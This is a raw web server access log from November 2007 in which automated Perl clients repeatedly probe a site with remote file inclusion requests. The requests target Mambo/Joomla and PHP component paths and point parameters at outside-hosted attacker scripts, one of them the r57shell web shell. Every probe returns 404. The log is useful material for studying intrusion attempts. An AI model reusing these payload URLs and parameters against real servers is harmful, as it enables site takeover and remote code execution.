209.137.246.138 - - [04/Nov/2007:16:00:01 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:00:01 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:00:01 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.137.246.138 - - [04/Nov/2007:16:00:02 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:00:07 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:00:08 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:00:08 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:00:09 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:00:11 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:00:11 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:00:12 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:00:12 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
82.85.18.110 - - [04/Nov/2007:16:00:13 -0800] "GET /logs/access_071001.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:00:13 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:00:13 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:00:15 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
82.85.18.110 - - [04/Nov/2007:16:00:16 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:00:16 -0800] "GET /logs/access_071022.log//administrator/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:00:16 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:00:17 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:00:17 -0800] "GET /logs/access_071001.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.112.98.168 - - [04/Nov/2007:16:00:18 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:00:18 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:00:22 -0800] "GET /logs/access_071008.log/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:00:22 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:00:23 -0800] "GET /@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:00:23 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:00:23 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
203.189.224.2 - - [04/Nov/2007:16:00:24 -0800] "GET /logs/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:00:26 -0800] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:00:26 -0800] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:00:29 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:00:30 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:00:30 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
38.114.104.57 - - [04/Nov/2007:16:00:39 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
86.120.49.2 - - [04/Nov/2007:16:00:41 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.120.49.2 - - [04/Nov/2007:16:00:41 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:00:47 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:00:47 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
38.114.104.94 - - [04/Nov/2007:16:00:48 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
213.112.98.168 - - [04/Nov/2007:16:00:48 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.246.4.133 - - [04/Nov/2007:16:00:50 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.246.4.133 - - [04/Nov/2007:16:00:50 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.246.4.133 - - [04/Nov/2007:16:00:50 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [04/Nov/2007:16:00:57 -0800] "GET /logs/administrator/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:00:58 -0800] "GET /administrator/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.137.246.138 - - [04/Nov/2007:16:00:58 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:00:58 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:00:59 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
219.94.145.104 - - [04/Nov/2007:16:01:00 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:01:00 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:01:00 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [04/Nov/2007:16:01:01 -0800] "GET /logs/access_071015.log//view.inc.php?phpAds_path=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
88.191.39.142 - - [04/Nov/2007:16:01:01 -0800] "GET //view.inc.php?phpAds_path=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [04/Nov/2007:16:01:02 -0800] "GET /logs//view.inc.php?phpAds_path=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [04/Nov/2007:16:01:02 -0800] "GET /logs/access_070827.log//view.inc.php?phpAds_path=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:01:08 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:01:08 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:01:09 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
61.78.56.125 - - [04/Nov/2007:16:01:33 -0800] "GET /logs/access_071001.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:01:33 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:01:34 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:01:36 -0800] "GET /logs/access_071008.log/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:01:36 -0800] "GET /@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:01:37 -0800] "GET /logs/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:01:38 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.214.236 - - [04/Nov/2007:16:01:42 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:01:44 -0800] "GET /administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:01:45 -0800] "GET /logs/administrator/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:01:50 -0800] "GET /logs/access_070917.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:01:51 -0800] "GET /administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:01:52 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:01:53 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:01:53 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:01:54 -0800] "GET /logs/access_071008.log/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:01:54 -0800] "GET /logs/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:01:55 -0800] "GET /logs/access_070730.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
88.45.219.178 - - [04/Nov/2007:16:01:55 -0800] "GET /@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
219.94.145.104 - - [04/Nov/2007:16:01:56 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:01:56 -0800] "GET /logs/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.94.145.104 - - [04/Nov/2007:16:01:57 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.246.4.133 - - [04/Nov/2007:16:02:01 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.246.4.133 - - [04/Nov/2007:16:02:02 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
84.246.4.133 - - [04/Nov/2007:16:02:02 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:02:07 -0800] "GET /logs/access_070806.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:02:08 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.137.246.138 - - [04/Nov/2007:16:02:08 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:02:09 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [04/Nov/2007:16:02:12 -0800] "GET /logs/access_071008.log/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:02:12 -0800] "GET /@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:02:13 -0800] "GET /logs/@rfihttp://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.12.31.102 - - [04/Nov/2007:16:02:16 -0800] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:02:17 -0800] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:02:17 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:02:25 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:02:28 -0800] "GET /logs//administrator/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
75.0.141.110 - - [04/Nov/2007:16:02:28 -0800] "GET //administrator/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:02:29 -0800] "GET /logs/access_070903.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:02:35 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:02:35 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.112.98.168 - - [04/Nov/2007:16:02:35 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
59.152.1.228 - - [04/Nov/2007:16:02:41 -0800] "GET /logs/access_070917.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.246.4.133 - - [04/Nov/2007:16:02:41 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.90.241.82 - - [04/Nov/2007:16:02:41 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.90.241.82 - - [04/Nov/2007:16:02:41 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:02:41 -0800] "GET /administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.152.1.228 - - [04/Nov/2007:16:02:42 -0800] "GET /logs/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [04/Nov/2007:16:02:43 -0800] "GET /logs/access_070730.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:02:47 -0800] "GET /logs/access_070827.log//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [04/Nov/2007:16:02:47 -0800] "GET //administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:02:48 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:02:48 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.85.18.110 - - [04/Nov/2007:16:02:49 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.78.56.125 - - [04/Nov/2007:16:02:49 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
207.58.168.78 - - [04/Nov/2007:16:02:50 -0800] "GET /logs//view.inc.php?phpAds_path=http://www.vanjas-world.net/guestbook/public/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.168.78 - - [04/Nov/2007:16:02:51 -0800] "GET //view.inc.php?phpAds_path=http://www.vanjas-world.net/guestbook/public/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:03:01 -0800] "GET /logs/access_070917.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.164.67.243 - - [04/Nov/2007:16:03:02 -0800] "GET //login.php?dir=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:03:07 -0800] "GET /administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
75.0.141.110 - - [04/Nov/2007:16:03:10 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:03:10 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:03:11 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:03:12 -0800] "GET /logs/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
